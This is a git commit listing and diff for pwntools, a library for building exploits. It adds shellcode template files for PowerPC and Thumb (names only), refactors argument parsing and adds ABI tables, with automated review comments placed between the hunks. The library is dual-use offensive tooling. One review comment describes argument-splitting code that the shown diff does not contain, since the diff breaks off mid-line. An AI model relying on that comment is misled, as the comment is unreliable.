create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/unlink.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/unlinkat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/unshare.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/ustat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/utime.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/utimensat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/utimes.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/vfork.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/vhangup.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/vmsplice.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/wait4.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/waitid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/waitpid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/write.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/writev.asm create mode 100644 pwnlib/shellcraft/templates/thumb/crash.asm create mode 100644 pwnlib/shellcraft/templates/thumb/itoa.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/accept.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/access.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/acct.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/alarm.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/bind.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/brk.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/cat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/chdir.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/chmod.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/chown.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/chroot.asm create mode 100644 
pwnlib/shellcraft/templates/thumb/linux/clock_getres.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/clock_gettime.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/clock_nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/clock_settime.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/clone.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/close.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/creat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/dup2.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/dup3.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/echo.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/epoll_create.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/epoll_create1.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/epoll_ctl.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/epoll_pwait.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/epoll_wait.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/execve.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/exit.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/faccessat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fallocate.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fchdir.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fchmod.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fchmodat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fchown.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fchownat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fcntl.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fdatasync.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/flock.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fork.asm create 
mode 100644 pwnlib/shellcraft/templates/thumb/linux/forkbomb.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/forkexit.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fstat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fstat64.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fstatat64.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fsync.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/ftruncate.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/ftruncate64.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/futimesat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getcwd.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getegid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/geteuid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getgid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getgroups.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getitimer.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getpeername.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getpgid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getpgrp.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getpid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getpmsg.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getppid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getpriority.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getresgid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getresuid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getrlimit.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getrusage.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getsid.asm create mode 100644 
pwnlib/shellcraft/templates/thumb/linux/getsockname.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getsockopt.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/gettimeofday.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getuid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/gtty.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/ioctl.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/ioperm.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/iopl.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/kill.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/killparent.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/lchown.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/link.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/linkat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/loader.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/loader_append.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/lseek.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/lstat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/lstat64.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/madvise.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mincore.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mkdir.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mkdirat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mknod.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mknodat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mlock.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mlockall.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mmap.asm mode change 100644 => 120000 pwnlib/shellcraft/templates/thumb/linux/mov.asm create mode 100644 
pwnlib/shellcraft/templates/thumb/linux/mprotect.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mq_notify.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mq_open.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mq_timedreceive.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mq_timedsend.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mq_unlink.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mremap.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/msync.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/munlock.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/munlockall.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/munmap.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/nice.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/open.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/openat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/pause.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/pipe.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/pipe2.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/poll.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/ppoll.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/prctl.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/pread.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/preadv.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/prlimit64.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/profil.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/ptrace.asm mode change 100644 => 120000 pwnlib/shellcraft/templates/thumb/linux/push.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/putpmsg.asm create mode 100644 
pwnlib/shellcraft/templates/thumb/linux/pwrite.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/pwritev.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/read.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/readahead.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/readdir.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/readlink.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/readlinkat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/readn.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/readv.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/recv.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/recvfrom.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/recvmmsg.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/recvmsg.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/remap_file_pages.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/rename.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/renameat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/rmdir.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_get_priority_max.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_get_priority_min.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_getaffinity.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_getparam.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_getscheduler.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_rr_get_interval.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_setaffinity.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_setparam.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_setscheduler.asm create mode 100644 
pwnlib/shellcraft/templates/thumb/linux/sched_yield.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/select.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sendfile.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sendfile64.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setdomainname.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setgid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setgroups.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sethostname.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setitimer.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setpgid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setpriority.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setregid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setresgid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setresuid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setreuid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setrlimit.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setsid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/settimeofday.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setuid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sigaction.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sigaltstack.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/signal.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sigpending.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sigprocmask.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sigreturn.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sigsuspend.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/splice.asm create mode 100644 
pwnlib/shellcraft/templates/thumb/linux/stage.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/stat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/stat64.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/stime.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/stty.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/symlink.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/symlinkat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sync.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sync_file_range.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/syslog.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/tee.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/time.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/timer_create.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/timer_delete.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/timer_getoverrun.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/timer_gettime.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/timer_settime.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/truncate.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/truncate64.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/ulimit.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/umask.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/uname.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/unlink.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/unlinkat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/unshare.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/ustat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/utime.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/utimensat.asm create mode 
100644 pwnlib/shellcraft/templates/thumb/linux/utimes.asm
create mode 100644 pwnlib/shellcraft/templates/thumb/linux/vfork.asm
create mode 100644 pwnlib/shellcraft/templates/thumb/linux/vhangup.asm
create mode 100644 pwnlib/shellcraft/templates/thumb/linux/vmsplice.asm
create mode 100644 pwnlib/shellcraft/templates/thumb/linux/wait4.asm
create mode 100644 pwnlib/shellcraft/templates/thumb/linux/waitid.asm
create mode 100644 pwnlib/shellcraft/templates/thumb/linux/waitpid.asm
create mode 100644 pwnlib/shellcraft/templates/thumb/linux/write.asm
create mode 100644 pwnlib/shellcraft/templates/thumb/linux/writev.asm
create mode 100644 pwnlib/shellcraft/templates/thumb/memcpy.asm
create mode 100644 pwnlib/shellcraft/templates/thumb/popad.asm
create mode 100644 pwnlib/shellcraft/templates/thumb/pushad.asm
create mode 100644 pwnlib/shellcraft/templates/thumb/setregs.asm
create mode 100644 pwnlib/shellcraft/templates/thumb/to_arm.asm
create mode 100644 pwnlib/shellcraft/templates/thumb/trap.asm
create mode 100644 pwnlib/shellcraft/templates/thumb/udiv_10.asm
create mode 100644 pwnlib/util/getdents.py
diff --git a/.travis.yml b/.travis.yml
index 56e4f3ab6..23deab4d1 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -4,6 +4,7 @@ addons: apt: packages: - gcc-multilib + - gcc-4.6-arm-linux-gnueabihf cache: - pip - directories:
diff --git a/docs/source/conf.py b/docs/source/conf.py
index e8e49f59f..000ba0650 100644
--- a/docs/source/conf.py
+++ b/docs/source/conf.py
@@ -45,9 +45,11 @@ doctest_global_setup = '''
import sys, os
os.environ['PWNLIB_NOTERM'] = '1'
+os.environ['PWNLIB_RANDOMIZE'] = '0'
import pwnlib
pwnlib.context.context.reset_local()
pwnlib.context.ContextType.defaults['log_level'] = 'ERROR'
+pwnlib.context.ContextType.defaults['randomize'] = False
pwnlib.term.text.when = 'never'
pwnlib.log.install_default_handler()
pwnlib.log.rootlogger.setLevel(1)
diff --git a/docs/source/shellcraft/thumb.rst b/docs/source/shellcraft/thumb.rst
index c2da6b31d..8beaddbe6 100644
--- a/docs/source/shellcraft/thumb.rst
+++ b/docs/source/shellcraft/thumb.rst
@@ -1,7 +1,7 @@
.. testsetup:: *
from pwn import *
- context.clear(arch='arm')
+ context.clear(arch='thumb')
:mod:`pwnlib.shellcraft.thumb` --- Shellcode for Thumb Mode
===========================================================
diff --git a/pwn/__init__.py b/pwn/__init__.py
index 8dee0ee25..07a0b3d3b 100644
--- a/pwn/__init__.py
+++ b/pwn/__init__.py
@@ -1,81 +1,8 @@
# Promote useful stuff to toplevel
from .toplevel import *
-log = getLogger('pwnlib.exploit')
+pwnlib.args.initialize()
+pwnlib.log.install_default_handler()
-# look for special args in argv
-def closure():
- term_mode = True
- import sys
- if not hasattr(sys, 'argv'):
- return
- import string, collections
- global args
- args = collections.defaultdict(str)
- def isident(s):
- first = string.uppercase + '_'
- body = string.digits + first
- if not s:
- return False
- if s[0] not in first:
- return False
- if not all(c in body for c in s[1:]):
- return False
- return True
- def asbool(s):
- if s.lower() == 'true':
- return True
- elif s.lower() == 'false':
- return False
- elif s.isdigit():
- return bool(int(s))
- else:
- raise ValueError('must be integer or boolean')
- # parse environtment variables
- for k, v in os.environ.items():
- if not k.startswith('PWNLIB_'):
- continue
- k = k[7:]
- if k == 'DEBUG':
- if asbool(v):
- context.log_level = 'DEBUG'
- elif k == 'SILENT':
- if asbool(v):
- context.log_level = 'ERROR'
- elif k == 'NOTERM':
- if asbool(v):
- term_mode = False
- elif isident(k):
- args[k] = v
- # parse command line
- # save a copy of argv for the log file header (see below)
- argv = sys.argv[:]
- for arg in argv:
- if arg == 'DEBUG':
- sys.argv.remove(arg)
- context.log_level = 'DEBUG'
- elif arg == 'SILENT':
- sys.argv.remove(arg)
- context.log_level = 'ERROR'
- elif arg == 'NOTERM':
- term_mode = False
- elif arg.find('=') > 0:
- k, v = arg.split('=', 1)
- if not isident(k):
- continue
- sys.argv.remove(arg)
- args[k] = v
- if 'LOG_LEVEL' in args:
- context.log_level = args['LOG_LEVEL']
- if 'LOG_FILE' in args:
- context.log_file = args['LOG_FILE']
- # put the terminal in rawmode unless NOTERM was specified
- if term_mode:
- term.init()
- # install a log handler and turn logging all the way up
- import pwnlib.log as log
- import logging
- log.install_default_handler()
-
-closure()
-del closure
+log = 
pwnlib.log.getLogger('pwnlib.exploit')
+args = pwnlib.args.args
diff --git a/pwn/toplevel.py b/pwn/toplevel.py
index 6d165da4f..42df2e729 100644
--- a/pwn/toplevel.py
+++ b/pwn/toplevel.py
@@ -21,6 +21,7 @@ from pwnlib.encoders import *
from pwnlib.elf import ELF
from pwnlib.elf import load
+from pwnlib.encoders import *
from pwnlib.exception import PwnlibException
from pwnlib.fmtstr import FmtStr, fmtstr_payload
from pwnlib.log import getLogger
@@ -44,6 +45,7 @@ from pwnlib.util import safeeval
from pwnlib.util.cyclic import *
from pwnlib.util.fiddling import *
+from pwnlib.util.getdents import *
from pwnlib.util.hashes import *
from pwnlib.util.lists import *
from pwnlib.util.misc import *
diff --git a/pwnlib/__init__.py b/pwnlib/__init__.py
index 728eaeb3d..09e12ecc0 100644
--- a/pwnlib/__init__.py
+++ b/pwnlib/__init__.py
@@ -5,6 +5,7 @@ version = __version__
__all__ = [
+ 'args',
'asm',
'atexception',
'atexit',
diff --git a/pwnlib/abi.py b/pwnlib/abi.py
index 2f73eac72..183683b53 100644
--- a/pwnlib/abi.py
+++ b/pwnlib/abi.py
@@ -34,6 +34,8 @@ def default():
(32, 'i386', 'linux'): linux_i386,
(64, 'amd64', 'linux'): linux_amd64,
(32, 'arm', 'linux'): linux_arm,
+ (32, 'thumb', 'linux'): linux_arm,
+ (32, 'mips', 'linux'): linux_mips,
(32, 'i386', 'windows'): windows_i386,
(64, 'amd64', 'windows'): windows_amd64,
}[(context.bits, context.arch, context.os)]
@@ -45,6 +47,8 @@ def syscall():
(32, 'i386', 'linux'): linux_i386_syscall,
(64, 'amd64', 'linux'): linux_amd64_syscall,
(32, 'arm', 'linux'): linux_arm_syscall,
+ (32, 'thumb', 'linux'): linux_arm_syscall,
+ (32, 'mips', 'linux'): linux_mips_syscall,
}[(context.bits, context.arch, context.os)]
@staticmethod
@@ -54,6 +58,7 @@ def sigreturn():
(32, 'i386', 'linux'): linux_i386_sigreturn,
(64, 'amd64', 'linux'): linux_amd64_sigreturn,
(32, 'arm', 'linux'): linux_arm_sigreturn,
+ (32, 'thumb', 'linux'): linux_arm_sigreturn,
}[(context.bits, context.arch, context.os)]
class SyscallABI(ABI):
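Review bot: The `pwnlib.args.initialize()` call that replaces the removed closure drops two guards the old code had: the closure returned early when `sys.argv` was absent and split `KEY=value` arguments with `split('=', 1)`, whereas the replacement visible at the end of this chunk does `argv = sys.argv[:]` unguarded and `arg, value = arg.split('=')`, so an argument whose value itself contains `=` would raise ValueError during `import pwn`. Restoring `arg, value = arg.split('=', 1)` in `initialize()` keeps the old behaviour. `args = pwnlib.args.args` aliases the module-level defaultdict at import time, and `initialize()` declares `global args`, so if that name is ever rebound `pwn.args` would silently diverge; a comment such as `# same defaultdict object that pwnlib.args fills in; it must be mutated, never rebound` would document the coupling. The rest of `initialize()` is outside this chunk, so the parsing loop could not be checked further.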
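Review bot: The added `from pwnlib.encoders import *` duplicates an import that the hunk header shows already precedes this hunk, so the second line is redundant and should be dropped. The second hunk's `from pwnlib.util.getdents import *` re-exports every public name of the new module into the `pwn` namespace; unless `pwnlib/util/getdents.py` defines `__all__` (not visible here), any helper names in it will shadow or collide with the earlier star-imports in this file, so either the module should declare `__all__` or the import should name the symbols it intends to export.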
@@ -77,10 +82,14 @@ class SigreturnABI(SyscallABI):
linux_i386 = ABI([], 4, 0)
linux_amd64 = ABI(['rdi','rsi','rdx','rcx','r8','r9'], 8, 0)
linux_arm = ABI(['r0', 'r1', 'r2', 'r3'], 8, 0)
+linux_aarch64 = ABI(['x0', 'x1', 'x2', 'x3'], 16, 0)
+linux_mips = ABI(['$a0','$a1','$a2','$a3'], 4, 0)
linux_i386_syscall = SyscallABI(['eax', 'ebx', 'ecx', 'edx', 'esi', 'edi', 'ebp'], 4, 0)
linux_amd64_syscall = SyscallABI(['rax','rdi', 'rsi', 'rdx', 'r10', 'r8', 'r9'], 8, 0)
linux_arm_syscall = SyscallABI(['r7', 'r0', 'r1', 'r2', 'r3', 'r4', 'r5', 'r6'], 4, 0)
+linux_aarch64_syscall = SyscallABI(['x8', 'x0', 'x1', 'x2', 'x3', 'x4', 'x5', 'x6'], 16, 0)
+linux_mips_syscall = ABI(['$v0', '$a0','$a1','$a2','$a3'], 4, 0)
linux_i386_sigreturn = SigreturnABI(['eax'], 4, 0)
linux_amd64_sigreturn = SigreturnABI(['rax'], 4, 0)
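Review bot: `linux_mips_syscall` is built with the plain `ABI` class while every other `*_syscall` entry on the surrounding lines, including the new `linux_aarch64_syscall`, is a `SyscallABI`; since `syscall()` (the hunk earlier in this file section) now dispatches to it, any caller that distinguishes syscall ABIs by type will treat MIPS differently, so this should read `linux_mips_syscall = SyscallABI(['$v0', '$a0','$a1','$a2','$a3'], 4, 0)`. The new `linux_aarch64` and `linux_aarch64_syscall` objects are defined here but not added to the `default()`/`syscall()` tables in the earlier hunks, so an aarch64 context still hits KeyError there; if that is deliberate pending the loader work, a comment saying so would help. AAPCS64 passes integer arguments in `x0` through `x7`, so `linux_aarch64 = ABI(['x0', 'x1', 'x2', 'x3'], 16, 0)` presumably makes callers treat the fifth through eighth arguments as stack arguments; `['x0', 'x1', 'x2', 'x3', 'x4', 'x5', 'x6', 'x7']` is the full list.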
@@ -93,101 +102,3 @@ class SigreturnABI(SyscallABI):
linux_i386_srop = ABI(['eax'], 4, 0)
linux_amd64_srop = ABI(['rax'], 4, 0)
linux_arm_srop = ABI(['r7'], 4, 0)
-
-
-''' === OLD CODE ===
-class AbiCall(Call):
- """
- Encapsulates ABI-specific information about a function call, which is
- to be executed with ROP.
- """
- #: Mapping of registers to the values to which they should be set, before
- #: $pc is set to ``addr``.
- registers = {}
-
- #: List of values which must appear in-order on the stack, including all
- #: padding required by the ABI (e.g. Windows x64 requires a minimum of 32 bytes)
- stack = []
-
- def __new__(cls, *a, **kw):
- # Allow explicit creation of subclasses
- if cls != AbiCall:
- return super(AbiCall, cls).__new__(cls, *a, **kw)
-
- # Do not allow explicit creation of AbiCall.
- # Default to the best choice.
- abis = {
- ('i386',32,'linux'): x86LinuxAbiCall,
- ('amd64',64,'linux'): amd64LinuxAbiCall,
- ('arm',32,'linux'): armLinuxAbiCall
- }
-
- key = (context.arch, context.bits, context.os)
-
- if key not in abis:
- log.error("Don't know how to make ROP calls for %r" % (key,))
-
- return super(AbiCall, cls).__new__(abis[key], *a, **kw)
-
- def __init__(self, name, target, args):
- super(AbiCall, self).__init__(name, target, args)
- self.registers = {}
- self.stack = []
-
- self.build()
-
-
-class StackAdjustingAbiCall(AbiCall):
- """
- Encapsulates information about a calling convention which
- may capture arguments on the stack, and as such the stack
- pointer must be adjusted in order to continue ROP execution.
-
- This functionality is separated out from the normal ABI call
- so that optimizations can be performed on the last call in
- the stack if there are no arguments.
- """
- def build(self, addr = None):
- self.stack.append(StackAdjustment())
-
-class x86LinuxAbiCall(StackAdjustingAbiCall):
- def build(self, addr = None):
- super(x86LinuxAbiCall, self).build()
-
- self.stack.extend(self.args)
-
-class amd64LinuxAbiCall(StackAdjustingAbiCall):
- def build(self, addr = None):
- super(amd64LinuxAbiCall, self).build()
-
- registers = ['rdi','rsi','rdx','rcx','r8','r9']
-
- for reg, arg in zip(registers, self.args):
- self.registers[reg] = arg
-
- self.stack.extend(self.args[len(registers):])
-
-class armLinuxAbiCall(StackAdjustingAbiCall):
- def build(self, addr = None):
- super(armLinuxAbiCall, self).build()
-
- registers = ['r0','r1','r2','r3']
- args = list(self.args)
-
- for reg, arg in zip(registers, args):
- self.registers[reg] = arg
-
- self.stack.extend(self.args[len(registers):])
-
-class x86SysretCall(x86LinuxAbiCall):
- def build(self, addr = None):
- super(x86SysretCall, self).build()
- self.stack = list(self.args)
- self.regs = {'eax': constants.i386.SYS_sigreturn}
-
-class x64SysretCall(AbiCall):
- def build(self, addr = None):
- super(x64SysretCall, self).build()
- self.stack = list(self.args)
- self.regs = {'rax': constants.amd64.SYS_sigreturn}
-'''
diff --git a/pwnlib/args.py b/pwnlib/args.py
new file mode 100644
index 000000000..66d1fd8b6
--- /dev/null
+++ b/pwnlib/args.py
@@ -0,0 +1,112 @@ +#!/usr/bin/env python2 +""" +""" +import collections +import logging +import os +import string +import sys +from .context import context +from . import term + +term_mode = False +args = collections.defaultdict(str) +env_prefix = 'PWNLIB_' + +def isident(s): + """ + Helper function to check whether a string is a valid identifier, + as passed in on the command-line. + """ + first = string.uppercase + '_' + body = string.digits + first + if not s: + return False + if s[0] not in first: + return False + if not all(c in body for c in s[1:]): + return False + return True + +def asbool(s): + """ + Convert a string to its boolean value + """ + if s.lower() == 'true': + return True + elif s.lower() == 'false': + return False + elif s.isdigit(): + return bool(int(s)) + else: + raise ValueError('must be integer or boolean: %r' % s) + +def set_log_level(x): + with context.local(log_level=x): + context.defaults['log_level']=context.log_level + +def set_log_file(x): + context.log_file=x + +def set_log_level_error(x): + set_log_level('error') + +def set_log_level_debug(x): + set_log_level('debug') + +def set_noterm(v): + if asbool(v): + global term_mode + term_mode = False + +def set_timeout(v): + context.defaults['timeout'] = int(v) + +def set_randomize(v): + context.defaults['randomize'] = asbool(v) + +def set_multiply(v): + context.defaults['multiply'] = int(v, 0) + +hooks = { + 'LOG_LEVEL': set_log_level, + 'LOG_FILE': set_log_file, + 'DEBUG': set_log_level_debug, + 'NOTERM': set_noterm, + 'SILENT': set_log_level_error, + 'RANDOMIZE': set_randomize, + 'MULTIPLY': set_multiply, + 'TIMEOUT': set_timeout +} + +def initialize(): + global args, term_mode + + for k, v in os.environ.items(): + if not k.startswith(env_prefix): + continue + k = k[len(env_prefix):] + + if k in hooks: + hooks[k](v) + elif isident(k): + args[k] = v + + argv = sys.argv[:] + for arg in 